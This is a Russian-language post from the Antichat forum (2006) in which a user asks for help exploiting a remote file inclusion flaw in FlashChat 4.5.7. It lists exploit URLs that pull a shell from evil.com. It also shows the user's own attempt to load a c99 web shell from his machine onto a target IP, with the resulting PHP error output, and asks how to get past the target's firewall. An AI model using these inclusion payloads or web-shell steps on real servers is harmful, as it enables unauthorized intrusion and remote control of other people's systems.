ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Перезагрузить страницу Flashchat !!!
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Flashchat !!!
  #1  
Старый 20.12.2006, 06:42
Аватар для karabym
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331

Репутация: 44
По умолчанию Flashchat !!!
Приветствую!!!

Вобщем есть такой вопросец хотел нагнуть FlashChat v 4.5.7 нашел баг под него на складе сайта www.milw0rm.com

Код:

http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt?

Видео данной уязвимости:

http://rapidshare.de/files/31362430/Flashchat.rar.html

------------------------------------------------------------------------------------------------

Ставлю я значит себе denwer кидаю туда вебшелл с99 и прописываю вот это:

http://ип_цель/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://ип_мой/c99.txt?


Идет запрос и шелл не хочет грузиться попробоал убрать [inc]

На это вебсерв отрыгивает такое:


Warning: main(y:\home\non-existent-host/inc/header.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(): Failed opening 'y:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(hdb.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

Fatal error: main(): Failed opening required 'hdb.inc.php' (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13


Есть небольшой ньюанс на компе_цели как я понял стоит фаирвол который пропускает не все подряд а именно разрешенные приложения админом..
может быть в этом дело ?!

Т.е его ip даже не пингуется... а как я понял баг работает по принцыпу бэкконекта
и возможно фаир рубит это дело на корню..

Вобщем или я туплю или чтото не так делаю

Пролейте свет !!!!!!


Вопрос в догонку

Честно гворя я не совсем понимаю почему в етом баге шелл должен быть в виде .txt а не в .php

Не нужно ли мне случаем чтобы мой вебсерв обрабатывал .txt как скрипты php ?!
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
FlashChat v4.7.0 †Romi4† PHP, PERL, MySQL, JavaScript 2 15.11.2006 01:19
FlashChat v4.7.0 ZikZak Болталка 3 14.11.2006 05:34
FlashChat Z4netZ Чаты 0 24.11.2004 17:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ